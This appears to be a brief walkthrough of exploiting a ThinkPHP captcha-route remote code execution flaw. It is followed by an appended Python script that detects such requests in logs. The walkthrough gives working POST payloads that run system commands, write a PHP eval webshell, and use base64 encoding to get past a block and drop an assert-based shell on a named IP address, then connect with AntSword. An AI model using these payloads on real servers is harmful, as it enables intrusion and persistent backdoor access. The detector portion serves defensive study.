Visit the /index.php?s=captcha page; an error is displayed.
Run whoami
View the file directory
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
Write a one-line webshell
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo <?php @eval($_POST['root009']); ?> >>/var/www/public/1.php
The write was blocked and did not succeed; bypass it with base64 encoding
http:// 159.75.16.25:8089/index.php?s=captcha(POST)_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3Jvb3QwMDknXSk7Pz5iYmI= | base64 -d >>/var/www/public/shell.php
My hand slipped here and I wrote two extra
Connect with AntSword
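The POST bodies above share a recognizable shape that can be flagged on the defensive side: `_method` set to a magic method, a `filter[]` naming a command-execution function, and a `server[...]` override. The following is an added example, not part of the original write-up; the log line format, the sample lines and the function names are constructed for illustration.

```python
from urllib.parse import parse_qsl

# PHP functions that should never arrive as a request-supplied filter name.
DANGEROUS_FILTERS = {"system", "exec", "passthru", "shell_exec",
                     "assert", "popen", "proc_open"}

# Constructed sample lines in an assumed format: "<client> <path> <raw POST body>"
SAMPLE_LOG = [
    "10.0.0.5 /index.php?s=captcha _method=__construct&filter[]=system"
    "&method=get&server[REQUEST_METHOD]=whoami",
    "10.0.0.6 /index.php?s=captcha %5Fmethod=__construct&filter%5B%5D=system"
    "&method=get&server%5BREQUEST_METHOD%5D=pwd",
    "10.0.0.7 /index.php?s=login username=alice&_method=PUT",
]


def inspect_body(body):
    """Return the reasons a form-encoded POST body matches the pattern."""
    reasons = []
    # parse_qsl percent-decodes keys and values, so %5Fmethod and
    # filter%5B%5D are normalised before the checks below.
    for key, value in parse_qsl(body, keep_blank_values=True):
        k, v = key.strip().lower(), value.strip()
        if k == "_method" and v.startswith("__"):
            reasons.append("_method names a magic method: " + v)
        elif (k == "filter" or k.startswith("filter[")) \
                and v.lower() in DANGEROUS_FILTERS:
            reasons.append("filter set to an execution function: " + v)
        elif k.startswith("server["):
            reasons.append("request overrides a server variable: " + key)
    return reasons


def scan(lines):
    """Return (client, path, reasons) for every line with at least one match."""
    hits = []
    for line in lines:
        client, path, body = line.split(" ", 2)  # body may itself contain spaces
        reasons = inspect_body(body)
        if reasons:
            hits.append((client, path, reasons))
    return hits


if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, "; ".join(reasons))
```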